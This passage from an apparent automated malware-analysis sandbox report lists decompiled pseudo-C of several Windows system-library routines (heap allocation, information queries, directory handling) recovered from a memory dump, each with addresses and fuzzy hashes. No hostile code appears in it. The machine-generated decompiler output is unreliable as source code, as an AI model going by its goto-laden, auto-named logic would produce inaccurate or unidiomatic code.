							_t83 =  *((intOrPtr*)(_t103 + 8));
							__eflags = _t83;
							if(_t83 != 0) {
								 *((intOrPtr*)(_t103 - 0x20)) = _t83;
								__eflags =  *_t83 - _t99;
								if( *_t83 == _t99) {
									_t102 = 0xc0000100;
									goto L19;
								} else {
									_t91 =  *((intOrPtr*)( *((intOrPtr*)(_t103 - 0x28)) + 0x30));
									_t66 =  *((intOrPtr*)(_t91 + 0x10));
									__eflags =  *((intOrPtr*)(_t66 + 0x48)) - _t83;
									if( *((intOrPtr*)(_t66 + 0x48)) == _t83) {
										__eflags =  *((intOrPtr*)(_t91 + 0x1c));
										if( *((intOrPtr*)(_t91 + 0x1c)) == 0) {
											L26:
											_t102 = E04AE2AE4(_t103 - 0x20,  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)),  *((intOrPtr*)(_t103 + 0x1c)));
											 *((intOrPtr*)(_t103 - 0x1c)) = _t102;
											__eflags = _t102 - 0xc0000100;
											if(_t102 != 0xc0000100) {
												goto L12;
											} else {
												_t99 = 1;
												_t83 =  *((intOrPtr*)(_t103 - 0x20));
												goto L18;
											}
										} else {
											_t69 = E04AC6600( *((intOrPtr*)(_t91 + 0x1c)));
											__eflags = _t69;
											if(_t69 != 0) {
												goto L26;
											} else {
												_t83 =  *((intOrPtr*)(_t103 + 8));
												goto L18;
											}
										}
									} else {
										L18:
										_t102 = E04AE2C50(_t83,  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)),  *((intOrPtr*)(_t103 + 0x1c)), _t99);
										L19:
										 *((intOrPtr*)(_t103 - 0x1c)) = _t102;
										goto L12;
									}
								}
								L28:
							} else {
								E04ACEEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
								 *((intOrPtr*)(_t103 - 4)) = 1;
								 *((intOrPtr*)(_t103 - 0x20)) =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t103 - 0x28)) + 0x30)) + 0x10)) + 0x48));
								_t102 =  *((intOrPtr*)(_t103 + 0x1c));
								_t76 = E04AE2AE4(_t103 - 0x20,  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)), _t102);
								 *((intOrPtr*)(_t103 - 0x1c)) = _t76;
								__eflags = _t76 - 0xc0000100;
								if(_t76 == 0xc0000100) {
									 *((intOrPtr*)(_t103 - 0x1c)) = E04AE2C50( *((intOrPtr*)(_t103 - 0x20)),  *((intOrPtr*)(_t103 + 0xc)), _t82,  *((intOrPtr*)(_t103 + 0x14)),  *((intOrPtr*)(_t103 + 0x18)), _t102, 1);
								}
								 *((intOrPtr*)(_t103 - 4)) = _t99;
								E04AE2ACB();
							}
						}
					}
					L12:
					 *((intOrPtr*)(_t103 - 4)) = 0xfffffffe;
					_t62 = _t102;
				}
				L13:
				return E04B0D0D1(_t62);
				goto L28;
			}

0x04ae2990
0x04ae2992
0x04ae2997
0x04ae29a3
0x04ae29a6
0x04ae29ab
0x04ae29ad
0x04ae29b2
0x04b25c80
0x04ae29b8
0x04ae29b8
0x04ae29bb
0x04ae29c0
0x04ae29c5
0x04ae29c6
0x04ae29c6
0x04ae29cb
0x00000000
0x00000000
0x04ae29cd
0x04ae29d0
0x04ae29d9
0x04ae29db
0x04ae29dd
0x04ae2a7f
0x04ae2a84
0x04ae2a87
0x04ae2a89
0x04b25ca1
0x04b25ca3
0x00000000
0x04ae2a8f
0x04ae2a8f
0x00000000
0x04ae2a8f
0x00000000
0x04ae29e3
0x04ae29e3
0x04ae29e3
0x00000000
0x04ae29e3
0x04ae29dd
0x00000000
0x04ae29db
0x04ae29e6
0x04ae29e9
0x04ae29eb
0x04ae29ed
0x04ae29f3
0x04ae29f5
0x04ae29f8
0x04ae29fa
0x04ae2a97
0x04ae2a9a
0x04ae2a9d
0x04ae2add
0x00000000
0x04ae2a9f
0x04ae2aa2
0x04ae2aa5
0x04ae2aa8
0x04ae2aab
0x04b25cab
0x04b25caf
0x04b25cc5
0x04b25cda
0x04b25cdc
0x04b25cdf
0x04b25ce5
0x00000000
0x04b25ceb
0x04b25ced
0x04b25cee
0x00000000
0x04b25cee
0x04b25cb1
0x04b25cb4
0x04b25cb9
0x04b25cbb
0x00000000
0x04b25cbd
0x04b25cbd
0x00000000
0x04b25cbd
0x04b25cbb
0x04ae2ab1
0x04ae2ab1
0x04ae2ac4
0x04ae2ac6
0x04ae2ac6
0x00000000
0x04ae2ac6
0x04ae2aab
0x00000000
0x04ae2a00
0x04ae2a09
0x04ae2a0e
0x04ae2a21
0x04ae2a24
0x04ae2a35
0x04ae2a3a
0x04ae2a3d
0x04ae2a42
0x04ae2a59
0x04ae2a59
0x04ae2a5c
0x04ae2a5f
0x04ae2a5f
0x04ae29fa
0x04ae29f3
0x04ae2a64
0x04ae2a64
0x04ae2a6b
0x04ae2a6b
0x04ae2a6d
0x04ae2a72
0x00000000

Memory Dump Source

Source File: 00000015.00000002.506314048.0000000004A90000.00000040.00000001.sdmp, Offset: 04A90000, based on PE: true

Associated: 00000015.00000002.507407731.0000000004BAB000.00000040.00000001.sdmp Download File
Associated: 00000015.00000002.507425477.0000000004BAF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5cc8bdf746755f688ecbc957216db181c1759544c5e0837dc1951fb736786e77
Instruction ID: 0f2f28602d47cd0fc35c22c35ac335dcc118e5441962d06a83224fcda2da65cd
Opcode Fuzzy Hash: 5cc8bdf746755f688ecbc957216db181c1759544c5e0837dc1951fb736786e77
Instruction Fuzzy Hash: 4F517072A00219EFEF25DF56C940AEEBBB9FF48314F448095E9246B250D731AD52DF90

Uniqueness

Uniqueness Score: -1.00%

Function 04AE4D3B, Relevance: .1, Instructions: 131
COMMON

Download Yara Rule

C-Code - Quality: 78%

			E04AE4D3B(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				signed int _v12;
				char _v176;
				char _v177;
				char _v184;
				intOrPtr _v192;
				intOrPtr _v196;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed short _t42;
				char* _t44;
				intOrPtr _t46;
				intOrPtr _t50;
				char* _t57;
				intOrPtr _t59;
				intOrPtr _t67;
				signed int _t69;

				_t64 = __edx;
				_v12 =  *0x4bad360 ^ _t69;
				_t65 = 0xa0;
				_v196 = __edx;
				_v177 = 0;
				_t67 = __ecx;
				_v192 = __ecx;
				E04AFFA60( &_v176, 0, 0xa0);
				_t57 =  &_v176;
				_t59 = 0xa0;
				if( *0x4ba7bc8 != 0) {
					L3:
					while(1) {
						asm("movsd");
						asm("movsd");
						asm("movsd");
						asm("movsd");
						_t67 = _v192;
						 *((intOrPtr*)(_t57 + 0x10)) = _a4;
						 *(_t57 + 0x24) =  *(_t57 + 0x24) & 0x00000000;
						 *(_t57 + 0x14) =  *(_t67 + 0x34) & 0x0000ffff;
						 *((intOrPtr*)(_t57 + 0x20)) = _v196;
						_push( &_v184);
						_push(_t59);
						_push(_t57);
						_push(0xa0);
						_push(_t57);
						_push(0xf);
						_t42 = E04AFB0B0();
						if(_t42 != 0xc0000023) {
							break;
						}
						if(_v177 != 0) {
							L04AD77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t57);
						}
						_v177 = 1;
						_t44 = L04AD4620(_t59,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v184);
						_t59 = _v184;
						_t57 = _t44;
						if(_t57 != 0) {
							continue;
						} else {
							_t42 = 0xc0000017;
							break;
						}
					}
					if(_t42 != 0) {
						_t65 = E04ABCCC0(_t42);
						if(_t65 != 0) {
							L10:
							if(_v177 != 0) {
								if(_t57 != 0) {
									L04AD77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t57);
								}
							}
							_t46 = _t65;
							L12:
							return E04AFB640(_t46, _t57, _v12 ^ _t69, _t64, _t65, _t67);
						}
						L7:
						_t50 = _a4;
						 *((intOrPtr*)(_t67 + 0x30)) =  *((intOrPtr*)(_t57 + 0x18));
						if(_t50 != 3) {
							if(_t50 == 2) {
								goto L8;
							}
							L9:
							if(E04AFF380(_t67 + 0xc, 0x4a95138, 0x10) == 0) {
								 *0x4ba60d8 = _t67;
							}
							goto L10;
						}
						L8:
						_t64 = _t57 + 0x28;
						E04AE4F49(_t67, _t57 + 0x28);
						goto L9;
					}
					_t65 = 0;
					goto L7;
				}
				if(E04AE4E70(0x4ba86b0, 0x4ae5690, 0, 0) != 0) {
					_t46 = E04ABCCC0(_t56);
					goto L12;
				} else {
					_t59 = 0xa0;
					goto L3;
				}
			}

0x04ae4d3b
0x04ae4d4d
0x04ae4d53
0x04ae4d58
0x04ae4d65
0x04ae4d6c
0x04ae4d71
0x04ae4d77
0x04ae4d7f
0x04ae4d8c
0x04ae4d8e
0x04ae4dad
0x04ae4db0
0x04ae4db7
0x04ae4db8
0x04ae4db9
0x04ae4dba
0x04ae4dbb
0x04ae4dc1
0x04ae4dc8
0x04ae4dcc
0x04ae4dd5
0x04ae4dde
0x04ae4ddf
0x04ae4de0
0x04ae4de1
0x04ae4de6
0x04ae4de7
0x04ae4de9
0x04ae4df3
0x00000000
0x00000000
0x04b26c7c
0x04b26c8a
0x04b26c8a
0x04b26c9d
0x04b26ca7
0x04b26cac
0x04b26cb2
0x04b26cb9
0x00000000
0x04b26cbf
0x04b26cbf
0x00000000
0x04b26cbf
0x04b26cb9
0x04ae4dfb
0x04b26ccf
0x04b26cd3
0x04ae4e32
0x04ae4e39
0x04b26ce0
0x04b26cf2
0x04b26cf2
0x04b26ce0
0x04ae4e3f
0x04ae4e41
0x04ae4e51
0x04ae4e51
0x04ae4e03
0x04ae4e03
0x04ae4e09
0x04ae4e0f
0x04ae4e57
0x00000000
0x00000000
0x04ae4e1b
0x04ae4e30
0x04ae4e5b
0x04ae4e5b
0x00000000
0x04ae4e30
0x04ae4e11
0x04ae4e11
0x04ae4e16
0x00000000
0x04ae4e16
0x04ae4e01
0x00000000
0x04ae4e01
0x04ae4da5
0x04b26c6b
0x00000000
0x04ae4dab
0x04ae4dab
0x00000000
0x04ae4dab

Memory Dump Source

Source File: 00000015.00000002.506314048.0000000004A90000.00000040.00000001.sdmp, Offset: 04A90000, based on PE: true

Associated: 00000015.00000002.507407731.0000000004BAB000.00000040.00000001.sdmp Download File
Associated: 00000015.00000002.507425477.0000000004BAF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 546fff5c0551176e5484c5898df9216bea2010647621cd2fcec39adf0fa3fa08
Instruction ID: 73ecba7a7ff75bbbde0bbd9b078f4b4007426c7e48b50e4762009b8e6eb50591
Opcode Fuzzy Hash: 546fff5c0551176e5484c5898df9216bea2010647621cd2fcec39adf0fa3fa08
Instruction Fuzzy Hash: 4D41C271A40318AFEB31EF15CE80FBAB7AAEB48714F04409AE95997280D774FD44CB91

Uniqueness

Uniqueness Score: -1.00%

Function 04AE4BAD, Relevance: .1, Instructions: 131
COMMON

Download Yara Rule

C-Code - Quality: 85%

			E04AE4BAD(intOrPtr __ecx, short __edx, signed char _a4, signed short _a8) {
				signed int _v8;
				short _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				char _v36;
				char _v156;
				short _v158;
				intOrPtr _v160;
				char _v164;
				intOrPtr _v168;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t45;
				intOrPtr _t74;
				signed char _t77;
				intOrPtr _t84;
				char* _t85;
				void* _t86;
				intOrPtr _t87;
				signed short _t88;
				signed int _t89;

				_t83 = __edx;
				_v8 =  *0x4bad360 ^ _t89;
				_t45 = _a8 & 0x0000ffff;
				_v158 = __edx;
				_v168 = __ecx;
				if(_t45 == 0) {
					L22:
					_t86 = 6;
					L12:
					E04ABCC50(_t86);
					L11:
					return E04AFB640(_t86, _t77, _v8 ^ _t89, _t83, _t84, _t86);
				}
				_t77 = _a4;
				if((_t77 & 0x00000001) != 0) {
					goto L22;
				}
				_t8 = _t77 + 0x34; // 0xdce0ba00
				if(_t45 !=  *_t8) {
					goto L22;
				}
				_t9 = _t77 + 0x24; // 0x4ba8504
				E04AD2280(_t9, _t9);
				_t87 = 0x78;
				 *(_t77 + 0x2c) =  *( *[fs:0x18] + 0x24);
				E04AFFA60( &_v156, 0, _t87);
				_t13 = _t77 + 0x30; // 0x3db8
				_t85 =  &_v156;
				_v36 =  *_t13;
				_v28 = _v168;
				_v32 = 0;
				_v24 = 0;
				_v20 = _v158;
				_v160 = 0;
				while(1) {
					_push( &_v164);
					_push(_t87);
					_push(_t85);
					_push(0x18);
					_push( &_v36);
					_push(0x1e);
					_t88 = E04AFB0B0();
					if(_t88 != 0xc0000023) {
						break;
					}
					if(_t85 !=  &_v156) {
						L04AD77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t85);
					}
					_t84 = L04AD4620(0,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v164);
					_v168 = _v164;
					if(_t84 == 0) {
						_t88 = 0xc0000017;
						goto L19;
					} else {
						_t74 = _v160 + 1;
						_v160 = _t74;
						if(_t74 >= 0x10) {
							L19:
							_t86 = E04ABCCC0(_t88);
							if(_t86 != 0) {
								L8:
								 *(_t77 + 0x2c) =  *(_t77 + 0x2c) & 0x00000000;
								_t30 = _t77 + 0x24; // 0x4ba8504
								E04ACFFB0(_t77, _t84, _t30);
								if(_t84 != 0 && _t84 !=  &_v156) {
									L04AD77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t84);
								}
								if(_t86 != 0) {
									goto L12;
								} else {
									goto L11;
								}
							}
							L6:
							 *(_t77 + 0x36) =  *(_t77 + 0x36) | 0x00004000;
							if(_v164 != 0) {
								_t83 = _t84;
								E04AE4F49(_t77, _t84);
							}
							goto L8;
						}
						_t87 = _v168;
						continue;
					}
				}
				if(_t88 != 0) {
					goto L19;
				}
				goto L6;
			}

0x04ae4bad
0x04ae4bbf
0x04ae4bc2
0x04ae4bc6
0x04ae4bcd
0x04ae4bd9
0x04b267fe
0x04b26800
0x04ae4ccc
0x04ae4ccd
0x04ae4cb7
0x04ae4cc9
0x04ae4cc9
0x04ae4bdf
0x04ae4be5
0x00000000
0x00000000
0x04ae4beb
0x04ae4bef
0x00000000
0x00000000
0x04ae4bf5
0x04ae4bf9
0x04ae4c06
0x04ae4c0b
0x04ae4c17
0x04ae4c1c
0x04ae4c1f
0x04ae4c25
0x04ae4c33
0x04ae4c3d
0x04ae4c40
0x04ae4c43
0x04ae4c47
0x04ae4c4d
0x04ae4c53
0x04ae4c54
0x04ae4c55
0x04ae4c56
0x04ae4c5b
0x04ae4c5c
0x04ae4c63
0x04ae4c6b
0x00000000
0x00000000
0x04b26776
0x04b26784
0x04b26784
0x04b2679f
0x04b267a7
0x04b267af
0x04b267ce
0x00000000
0x04b267b1
0x04b267b7
0x04b267b8
0x04b267c1
0x04b267d3
0x04b267d9
0x04b267dd
0x04ae4c94
0x04ae4c94
0x04ae4c98
0x04ae4c9c
0x04ae4ca3
0x04b267f4
0x04b267f4
0x04ae4cb5
0x00000000
0x00000000
0x00000000
0x00000000
0x04ae4cb5
0x04ae4c79
0x04ae4c7e
0x04ae4c89
0x04ae4c8b
0x04ae4c8f
0x04ae4c8f
0x00000000
0x04ae4c89
0x04b267c3
0x00000000
0x04b267c3
0x04b267af
0x04ae4c73
0x00000000
0x00000000
0x00000000

Memory Dump Source

Source File: 00000015.00000002.506314048.0000000004A90000.00000040.00000001.sdmp, Offset: 04A90000, based on PE: true

Associated: 00000015.00000002.507407731.0000000004BAB000.00000040.00000001.sdmp Download File
Associated: 00000015.00000002.507425477.0000000004BAF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f850c1bf6de928248675c1e26bfbe7355878882f3d4936e2e62bb68ee17c7291
Instruction ID: 9da0d4e63d526a5652e8dfd2a8c4cfabb849511ce144f238deb9c768f293d70a
Opcode Fuzzy Hash: f850c1bf6de928248675c1e26bfbe7355878882f3d4936e2e62bb68ee17c7291
Instruction Fuzzy Hash: 8641B635A002289BDB21DF65CA40FEA77B8EF49710F0105A5E90DAB250D774FE84CB95

Uniqueness

Uniqueness Score: -1.00%

Function 04AC8A0A, Relevance: .1, Instructions: 120
COMMON

Download Yara Rule

C-Code - Quality: 94%

			E04AC8A0A(intOrPtr* __ecx, signed int __edx) {
				signed int _v8;
				char _v524;
				signed int _v528;
				void* _v532;
				char _v536;
				char _v540;
				char _v544;
				intOrPtr* _v548;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t44;
				void* _t46;
				void* _t48;
				signed int _t53;
				signed int _t55;
				intOrPtr* _t62;
				void* _t63;
				unsigned int _t75;
				signed int _t79;
				unsigned int _t81;
				unsigned int _t83;
				signed int _t84;
				void* _t87;

				_t76 = __edx;
				_v8 =  *0x4bad360 ^ _t84;
				_v536 = 0x200;
				_t79 = 0;
				_v548 = __edx;
				_v544 = 0;
				_t62 = __ecx;
				_v540 = 0;
				_v532 =  &_v524;
				if(__edx == 0 || __ecx == 0) {
					L6:
					return E04AFB640(_t79, _t62, _v8 ^ _t84, _t76, _t79, _t81);
				} else {
					_v528 = 0;
					E04ACE9C0(1, __ecx, 0, 0,  &_v528);
					_t44 = _v528;
					_t81 =  *(_t44 + 0x48) & 0x0000ffff;
					_v528 =  *(_t44 + 0x4a) & 0x0000ffff;
					_t46 = 0xa;
					_t87 = _t81 - _t46;
					if(_t87 > 0 || _t87 == 0) {
						 *_v548 = 0x4a91180;
						L5:
						_t79 = 1;
						goto L6;
					} else {
						_t48 = E04AE1DB5(_t62,  &_v532,  &_v536);
						_t76 = _v528;
						if(_t48 == 0) {
							L9:
							E04AF3C2A(_t81, _t76,  &_v544);
							 *_v548 = _v544;
							goto L5;
						}
						_t62 = _v532;
						if(_t62 != 0) {
							_t83 = (_t81 << 0x10) + (_t76 & 0x0000ffff);
							_t53 =  *_t62;
							_v528 = _t53;
							if(_t53 != 0) {
								_t63 = _t62 + 4;
								_t55 = _v528;
								do {
									if( *((intOrPtr*)(_t63 + 0x10)) == 1) {
										if(E04AC8999(_t63,  &_v540) == 0) {
											_t55 = _v528;
										} else {
											_t75 = (( *(_v540 + 0x14) & 0x0000ffff) << 0x10) + ( *(_v540 + 0x16) & 0x0000ffff);
											_t55 = _v528;
											if(_t75 >= _t83) {
												_t83 = _t75;
											}
										}
									}
									_t63 = _t63 + 0x14;
									_t55 = _t55 - 1;
									_v528 = _t55;
								} while (_t55 != 0);
								_t62 = _v532;
							}
							if(_t62 !=  &_v524) {
								L04AD77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t79, _t62);
							}
							_t76 = _t83 & 0x0000ffff;
							_t81 = _t83 >> 0x10;
						}
						goto L9;
					}
				}
			}

0x04ac8a0a
0x04ac8a1c
0x04ac8a23
0x04ac8a2e
0x04ac8a30
0x04ac8a36
0x04ac8a3c
0x04ac8a3e
0x04ac8a4a
0x04ac8a52
0x04ac8a9c
0x04ac8aae
0x04ac8a58
0x04ac8a5e
0x04ac8a6a
0x04ac8a6f
0x04ac8a75
0x04ac8a7d
0x04ac8a85
0x04ac8a86
0x04ac8a89
0x04ac8a93
0x04ac8a99
0x04ac8a9b
0x00000000
0x04ac8aaf
0x04ac8abe
0x04ac8ac3
0x04ac8acb
0x04ac8ad7
0x04ac8ae0
0x04ac8af1
0x00000000
0x04ac8af1
0x04ac8acd
0x04ac8ad5
0x04ac8afb
0x04ac8afd
0x04ac8aff
0x04ac8b07
0x04ac8b22
0x04ac8b24
0x04ac8b2a
0x04ac8b2e
0x04ac8b3f
0x04ac8b78
0x04ac8b41
0x04ac8b52
0x04ac8b54
0x04ac8b5c
0x04ac8b74
0x04ac8b74
0x04ac8b5c
0x04ac8b3f
0x04ac8b5e
0x04ac8b61
0x04ac8b64
0x04ac8b64
0x04ac8b6c
0x04ac8b6c
0x04ac8b11
0x04b19cd5
0x04b19cd5
0x04ac8b17
0x04ac8b1a
0x04ac8b1a
0x00000000
0x04ac8ad5
0x04ac8a89

Memory Dump Source

Source File: 00000015.00000002.506314048.0000000004A90000.00000040.00000001.sdmp, Offset: 04A90000, based on PE: true

Associated: 00000015.00000002.507407731.0000000004BAB000.00000040.00000001.sdmp Download File
Associated: 00000015.00000002.507425477.0000000004BAF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c62580904ad8398514cfd9477113eecc0d19b9dbfc1de7a0e0dc32df9c1e2459
Instruction ID: 74b0ae566af22882a07cbeedf7ebce10d5ddd0a2026b6d29a51fca7663395245
Opcode Fuzzy Hash: c62580904ad8398514cfd9477113eecc0d19b9dbfc1de7a0e0dc32df9c1e2459
Instruction Fuzzy Hash: 4C4171B0A0022C9BDB64EF55CC88AAAB3F4FF54301F5145EEE81997251E774AE80CF60

Uniqueness

Uniqueness Score: -1.00%

Function 04B369A6, Relevance: .1, Instructions: 108
COMMON

Download Yara Rule

C-Code - Quality: 69%

			E04B369A6(signed short* __ecx, void* __eflags) {
				signed int _v8;
				signed int _v16;
				intOrPtr _v20;
				signed int _v24;
				signed short _v28;
				signed int _v32;
				intOrPtr _v36;
				signed int _v40;
				char* _v44;
				signed int _v48;
				intOrPtr _v52;
				signed int _v56;
				char _v60;
				signed int _v64;
				char _v68;
				char _v72;
				signed short* _v76;
				signed int _v80;
				char _v84;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t68;
				intOrPtr _t73;
				signed short* _t74;
				void* _t77;
				void* _t78;
				signed int _t79;
				signed int _t80;

				_v8 =  *0x4bad360 ^ _t80;
				_t75 = 0x100;
				_v64 = _v64 & 0x00000000;
				_v76 = __ecx;
				_t79 = 0;
				_t68 = 0;
				_v72 = 1;
				_v68 =  *((intOrPtr*)( *[fs:0x18] + 0x20));
				_t77 = 0;
				if(L04AC6C59(__ecx[2], 0x100, __eflags) != 0) {
					_t79 =  *((intOrPtr*)( *[fs:0x30] + 0x1e8));
					if(_t79 != 0 && E04B36BA3() != 0) {
						_push(0);
						_push(0);
						_push(0);
						_push(0x1f0003);
						_push( &_v64);
						if(E04AF9980() >= 0) {
							E04AD2280(_t56, 0x4ba8778);
							_t77 = 1;
							_t68 = 1;
							if( *0x4ba8774 == 0) {
								asm("cdq");
								 *(_t79 + 0xf70) = _v64;
								 *(_t79 + 0xf74) = 0x100;
								_t75 = 0;
								_t73 = 4;
								_v60 =  &_v68;
								_v52 = _t73;
								_v36 = _t73;
								_t74 = _v76;
								_v44 =  &_v72;
								 *0x4ba8774 = 1;
								_v56 = 0;
								_v28 = _t74[2];
								_v48 = 0;
								_v20 = ( *_t74 & 0x0000ffff) + 2;
								_v40 = 0;
								_v32 = 0;
								_v24 = 0;
								_v16 = 0;
								if(E04ABB6F0(0x4a9c338, 0x4a9c288, 3,  &_v60) == 0) {
									_v80 = _v80 | 0xffffffff;
									_push( &_v84);
									_push(0);
									_push(_v64);
									_v84 = 0xfa0a1f00;
									E04AF9520();
								}
							}
						}
					}
				}
				if(_v64 != 0) {
					_push(_v64);
					E04AF95D0();
					 *(_t79 + 0xf70) =  *(_t79 + 0xf70) & 0x00000000;
					 *(_t79 + 0xf74) =  *(_t79 + 0xf74) & 0x00000000;
				}
				if(_t77 != 0) {
					E04ACFFB0(_t68, _t77, 0x4ba8778);
				}
				_pop(_t78);
				return E04AFB640(_t68, _t68, _v8 ^ _t80, _t75, _t78, _t79);
			}

0x04b369b5
0x04b369be
0x04b369c3
0x04b369c9
0x04b369cc
0x04b369d1
0x04b369d3
0x04b369de
0x04b369e1
0x04b369ea
0x04b369f6
0x04b369fe
0x04b36a13
0x04b36a14
0x04b36a15
0x04b36a16
0x04b36a1e
0x04b36a26
0x04b36a31
0x04b36a36
0x04b36a37
0x04b36a40
0x04b36a49
0x04b36a4a
0x04b36a53
0x04b36a59
0x04b36a5d
0x04b36a5e
0x04b36a64
0x04b36a67
0x04b36a6a
0x04b36a6d
0x04b36a70
0x04b36a77
0x04b36a7d
0x04b36a86
0x04b36a89
0x04b36a9c
0x04b36a9f
0x04b36aa2
0x04b36aa5
0x04b36aaf
0x04b36ab1
0x04b36ab8
0x04b36ab9
0x04b36abb
0x04b36abe
0x04b36ac5
0x04b36ac5
0x04b36aaf
0x04b36a40
0x04b36a26
0x04b369fe
0x04b36ace
0x04b36ad0
0x04b36ad3
0x04b36ad8
0x04b36adf
0x04b36adf
0x04b36ae8
0x04b36aef
0x04b36aef
0x04b36af9
0x04b36b06

Memory Dump Source

Source File: 00000015.00000002.506314048.0000000004A90000.00000040.00000001.sdmp, Offset: 04A90000, based on PE: true

Associated: 00000015.00000002.507407731.0000000004BAB000.00000040.00000001.sdmp Download File
Associated: 00000015.00000002.507425477.0000000004BAF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2f739942a0c870848b0857dc6202af46363e1680d6d78011c90b55aa35b49d4a
Instruction ID: ca2266bb9c87d7b7fd9f79abfd5afb06bf83b07de04759faf7eb2c835ca145ce
Opcode Fuzzy Hash: 2f739942a0c870848b0857dc6202af46363e1680d6d78011c90b55aa35b49d4a
Instruction Fuzzy Hash: 14417CB1D00208AFDB24DFA5D940BEEBBF8EF48715F04816AE914A7250EB74A906CB50

Uniqueness

Uniqueness Score: -1.00%

Function 04AB5210, Relevance: .1, Instructions: 107
COMMON

Download Yara Rule

C-Code - Quality: 85%

			E04AB5210(intOrPtr _a4, void* _a8) {
				void* __ecx;
				intOrPtr _t31;
				signed int _t32;
				signed int _t33;
				intOrPtr _t35;
				signed int _t52;
				void* _t54;
				void* _t56;
				unsigned int _t59;
				signed int _t60;
				void* _t61;

				_t61 = E04AB52A5(1);
				if(_t61 == 0) {
					_t31 =  *((intOrPtr*)( *[fs:0x30] + 0x10));
					_t54 =  *((intOrPtr*)(_t31 + 0x28));
					_t59 =  *(_t31 + 0x24) & 0x0000ffff;
				} else {
					_t54 =  *((intOrPtr*)(_t61 + 0x10));
					_t59 =  *(_t61 + 0xc) & 0x0000ffff;
				}
				_t60 = _t59 >> 1;
				_t32 = 0x3a;
				if(_t60 < 2 ||  *((intOrPtr*)(_t54 + _t60 * 2 - 4)) == _t32) {
					_t52 = _t60 + _t60;
					if(_a4 > _t52) {
						goto L5;
					}
					if(_t61 != 0) {
						asm("lock xadd [esi], eax");
						if((_t32 | 0xffffffff) == 0) {
							_push( *((intOrPtr*)(_t61 + 4)));
							E04AF95D0();
							L04AD77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t61);
						}
					} else {
						E04ACEB70(_t54, 0x4ba79a0);
					}
					_t26 = _t52 + 2; // 0xddeeddf0
					return _t26;
				} else {
					_t52 = _t60 + _t60;
					if(_a4 < _t52) {
						if(_t61 != 0) {
							asm("lock xadd [esi], eax");
							if((_t32 | 0xffffffff) == 0) {
								_push( *((intOrPtr*)(_t61 + 4)));
								E04AF95D0();
								L04AD77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t61);
							}
						} else {
							E04ACEB70(_t54, 0x4ba79a0);
						}
						return _t52;
					}
					L5:
					_t33 = E04AFF3E0(_a8, _t54, _t52);
					if(_t61 == 0) {
						E04ACEB70(_t54, 0x4ba79a0);
					} else {
						asm("lock xadd [esi], eax");
						if((_t33 | 0xffffffff) == 0) {
							_push( *((intOrPtr*)(_t61 + 4)));
							E04AF95D0();
							L04AD77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t61);
						}
					}
					_t35 = _a8;
					if(_t60 <= 1) {
						L9:
						_t60 = _t60 - 1;
						 *((short*)(_t52 + _t35 - 2)) = 0;
						goto L10;
					} else {
						_t56 = 0x3a;
						if( *((intOrPtr*)(_t35 + _t60 * 2 - 4)) == _t56) {
							 *((short*)(_t52 + _t35)) = 0;
							L10:
							return _t60 + _t60;
						}
						goto L9;
					}
				}
			}

0x04ab5220
0x04ab5224
0x04b10d13
0x04b10d16
0x04b10d19
0x04ab522a
0x04ab522a
0x04ab522d
0x04ab522d
0x04ab5231
0x04ab5235
0x04ab5239
0x04b10d5c
0x04b10d62
0x00000000
0x00000000
0x04b10d6a
0x04b10d7b
0x04b10d7f
0x04b10d81
0x04b10d84
0x04b10d95
0x04b10d95
0x04b10d6c
0x04b10d71
0x04b10d71
0x04b10d9a
0x00000000
0x04ab524a
0x04ab524a
0x04ab5250
0x04b10d24
0x04b10d35
0x04b10d39
0x04b10d3b
0x04b10d3e
0x04b10d50
0x04b10d50
0x04b10d26
0x04b10d2b
0x04b10d2b
0x00000000
0x04b10d55
0x04ab5256
0x04ab525b
0x04ab5265
0x04b10da7
0x04ab526b
0x04ab526e
0x04ab5272
0x04b10db1
0x04b10db4
0x04b10dc5
0x04b10dc5
0x04ab5272
0x04ab5278
0x04ab527e
0x04ab528a
0x04ab528c
0x04ab528d
0x00000000
0x04ab5280
0x04ab5282
0x04ab5288
0x04ab529f
0x04ab5292
0x00000000
0x04ab5292
0x00000000
0x04ab5288
0x04ab527e

Memory Dump Source

Source File: 00000015.00000002.506314048.0000000004A90000.00000040.00000001.sdmp, Offset: 04A90000, based on PE: true

Associated: 00000015.00000002.507407731.0000000004BAB000.00000040.00000001.sdmp Download File
Associated: 00000015.00000002.507425477.0000000004BAF000.00000040.00000001.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5182cf752899d9ab6a5ebc303ee66f629221d4366d952c067c2a16b833e46858
Instruction ID: 74162a7c646f51ec0a20f072ee8c95650e5a021b35364a1849139efb65e5940f
